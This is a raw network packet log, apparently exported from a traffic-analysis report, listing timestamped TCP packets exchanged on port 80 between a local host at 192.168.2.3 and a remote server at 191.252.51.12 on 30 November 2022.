                                                  Nov 30, 2022 00:37:09.326971054 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.327016115 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.327030897 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.327092886 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.327116013 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.327140093 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.327202082 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.327203989 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.327253103 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.327297926 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.327316999 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.327343941 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.327388048 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.327408075 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.327435017 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.327478886 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.327496052 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.327523947 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.327568054 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.327584028 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.327615023 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.327657938 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.327680111 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.327706099 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.327764988 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.474324942 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.474400997 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.474447012 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.474526882 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.474559069 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.474575996 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.474623919 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.474667072 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.474675894 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.474714041 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.474716902 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.474757910 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.474802017 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.474802017 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.474845886 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.474869967 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.474920034 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.474967003 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.474983931 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.475013018 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.475059986 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.475080967 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.475106955 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.475152016 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.475167036 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.475198984 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.475246906 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.475276947 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.475291967 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.475336075 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.475366116 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.475380898 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.475425005 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.475441933 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.475471020 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.475516081 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.475537062 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.475560904 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.475605965 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.475630045 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.475651026 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.475697994 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.475718975 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.475744963 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.475796938 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.475811005 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.475841999 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.475887060 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.475927114 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.475929022 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.475975037 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.476008892 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.476020098 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.476063967 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.476087093 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.476109028 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.476151943 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.476171017 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.476198912 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.476265907 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.539864063 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.539927006 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.539963007 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.540008068 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.540091038 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.540133953 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.540180922 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.540226936 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.540276051 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.540319920 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.540355921 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.540385008 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.540385962 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.540385962 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.540385962 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.540401936 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.540450096 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.540489912 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.540497065 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.540548086 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.540560961 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.540596008 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.540642977 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.540654898 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.540688038 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.540730953 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.540738106 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.540775061 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.540818930 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.540827036 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.540862083 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.540906906 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.540915966 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.540951014 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.540996075 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.541009903 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.541040897 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.541085005 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.541106939 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.541129112 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.541174889 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.541193008 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.541219950 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.541266918 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.541286945 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.541311979 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.541357040 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.541368961 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.541402102 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.541446924 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.541457891 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.541491985 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.541536093 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.541546106 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.541580915 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.541625977 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.541632891 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.541671038 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.541714907 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.541728973 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.541760921 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.541805029 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.541814089 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.541850090 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.541893959 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.541903973 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.541939020 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.541986942 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.541991949 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.542030096 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.542074919 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.542083025 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.542119026 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.542177916 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.688275099 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688309908 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688327074 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688340902 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688355923 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688371897 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688404083 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688421965 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688441038 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688461065 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688478947 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688497066 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688513994 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688530922 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688551903 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688569069 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688586950 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688605070 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688622952 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688626051 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.688642979 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688662052 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688674927 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.688679934 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688693047 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.688699961 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688718081 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688731909 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.688736916 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688755989 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688760996 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.688775063 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688792944 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688810110 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688817024 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.688828945 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688844919 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.688848019 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688867092 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688879013 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.688884974 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688904047 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688913107 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.688922882 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688940048 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688951015 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.688958883 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688977003 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.688991070 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.688996077 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.689014912 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.689021111 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.689033031 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.689050913 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.689054966 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.689069033 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.689088106 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.689091921 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.689106941 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.689126015 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.689141035 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.689143896 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.689162016 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.689169884 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.689182043 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.689199924 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.689273119 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.754311085 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.754383087 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.754432917 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.754477978 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.754476070 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.754527092 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.754534006 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.754578114 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.754621983 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.754662037 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.754671097 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.754720926 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.754724979 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.754765034 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.754808903 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.754810095 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.754854918 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.754926920 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.754966021 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.755012035 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.755059004 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.755063057 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.755105019 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.755148888 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.755151033 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.755192995 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.755237103 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.755239010 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.755285978 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.755330086 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.755362988 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.755517960 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.755564928 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.755565882 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.755609989 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.755656004 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.755673885 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.755700111 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.755745888 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.755748987 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.755791903 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.755836964 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.755837917 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.755884886 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.755928040 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.755929947 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.755976915 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.756022930 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.756023884 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.756069899 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.756114006 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.756115913 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.756160975 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.756205082 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.756207943 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.756251097 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.756297112 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.756303072 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.756344080 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.756391048 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.756396055 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.756437063 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.756483078 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.756484985 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.756527901 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.756575108 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.756576061 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.756619930 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.756664038 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.756666899 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.756710052 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.756756067 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.756761074 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.756802082 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.756850004 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.901237011 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.901278973 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.901298046 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.901335955 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.901355028 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.901375055 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.901393890 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.901412010 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.901431084 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.901448965 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.901468039 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.901484966 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.901482105 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.901482105 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.901482105 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.901483059 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.901504040 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.901525021 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.901542902 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.901544094 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.901542902 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.901566982 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.901575089 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.901587963 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.901607990 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.901613951 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.901628017 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.901648998 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.901659966 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.901668072 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.901689053 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.901699066 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.901706934 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.901726007 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.901735067 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.901746035 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.901765108 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:09.901772022 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:09.901784897 CET8049698191.252.51.12192.168.2.3
